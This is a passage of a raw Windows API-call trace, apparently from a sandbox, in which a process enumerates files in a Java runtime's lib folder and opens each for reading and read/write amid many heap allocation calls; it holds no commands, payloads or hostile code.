lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d)) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.662] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.662] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.662] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x84e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="meta-index", cAlternateFileName="META-I~1")) returned 1 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0097.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.663] AreFileApisANSI () returned 1 [0097.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index", lpUsedDefaultChar=0x0) returned 50 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.663] AreFileApisANSI () returned 1 [0097.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46ac8 [0097.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 50 [0097.664] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.664] GetFileType (hFile=0x360) returned 0x1 [0097.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0097.664] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.664] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.664] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.664] CloseHandle (hObject=0x360) returned 1 [0097.664] AreFileApisANSI () returned 1 [0097.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46ba8 [0097.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46ba8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 50 [0097.665] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.665] GetFileType (hFile=0x360) returned 0x1 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0097.665] CloseHandle (hObject=0x360) returned 1 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.666] AreFileApisANSI () returned 1 [0097.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46908 [0097.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index") returned 50 [0097.666] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x84e)) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.666] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1170, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="net.properties", cAlternateFileName="NET~1.PRO")) returned 1 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0097.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.667] AreFileApisANSI () returned 1 [0097.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties", lpUsedDefaultChar=0x0) returned 54 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0097.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.667] AreFileApisANSI () returned 1 [0097.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0097.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75b70 [0097.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 54 [0097.668] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.668] GetFileType (hFile=0x360) returned 0x1 [0097.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0097.668] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.668] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.668] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.668] CloseHandle (hObject=0x360) returned 1 [0097.669] AreFileApisANSI () returned 1 [0097.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75be8 [0097.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 54 [0097.669] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.669] GetFileType (hFile=0x360) returned 0x1 [0097.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0097.669] CloseHandle (hObject=0x360) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.670] HeapFree (in: hHeap=0x20000, 